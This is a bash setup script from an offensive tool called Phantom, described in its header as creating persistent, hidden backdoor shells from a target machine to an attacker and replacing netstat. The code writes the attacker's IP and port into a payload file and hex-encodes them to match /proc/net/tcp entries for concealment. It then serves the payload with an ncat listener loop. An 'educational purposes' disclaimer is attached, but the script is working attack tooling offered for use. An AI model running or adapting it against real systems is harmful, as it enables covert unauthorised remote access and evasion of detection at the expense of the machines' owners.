#!/bin/bash

: 'Phantom is a tool which creates backdoor shells from a target machine to an attacker`s and
hides their pid, persisting through reboots. It also hides the files needed to perform the above and replaces netstat.

***Phantom was created for educational purposes. Stay away from illegal activities.***

Copyright © 2018 Konstantinos Sarantopoulos

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'

#check the number of arguments given
if [ $# -ne 3 ]; then
cat << EOF
Syntax: phantom-init  [ip=][port1=][port2=]

ip: the attacker's ip (e.g. ip=127.0.0.1)
port1: the port that listens for connections to deliver the payload (e.g. port1=8888)
port2: the port that listens for the backdoor shells after delivering the payload (e.g. port2=9999)
EOF
  exit
fi

#parse the arguments
for i in $@; do
  if [ "$(expr $i : ip)" != "0" ]; then
    ip=${i#*=}
  elif [ "$(expr $i : port1)" != "0" ]; then
    port1=${i#*=}
  elif [ "$(expr $i : port2)" != "0" ]; then
    port2=${i#*=}
  fi
done

#change the ip and port in payload
sed -i "s%ip=\".*\"%ip=\"$ip\"%" payload
sed -i "s%port=\".*\"%port=\"$port2\"%" payload

#--change the ip and port in hiding_script--
#convert the ip to hex
IFS='.' read -r -a ip_dec <<<$ip
ip_hex=()
hex_ip=""
for ((i=0; i < ${#ip_dec[@]}; i++)); do
  if [ ${ip_dec[$i]} -gt 15 ]; then
    ip_hex[${#ip_dec[@]}-$i]=$(printf "%x" ${ip_dec[$i]})
  else
    ip_hex[${#ip_dec[@]}-$i]=$(printf "0%x" ${ip_dec[$i]})
  fi
done
for i in ${ip_hex[@]}; do
  hex_ip+=$i
done
#convert all letters to upper (needed for /proc/net/tcp)
hex_ip=$(echo $hex_ip | tr [:lower:] [:upper:])
#convert the port to hex
hex_port=$(printf "%x" $port2)
#convert all letters to upper (needed for /proc/net/tcp)
hex_port=$(echo $hex_port | tr [:lower:] [:upper:])
#replace the ip:port in services
sed -i "s%~ /.*:.*/%~ /$hex_ip:$hex_port/%" payload

#--change the ip and port in phantom-firewall---
sed -i "s%~ /.*:.*/%~ /$ip:$port2/%" phantom-firewall

#start ncat and invoke the phantom script when a connection occurs
while true; do
  ncat -v -l -p $port1 <payload
done
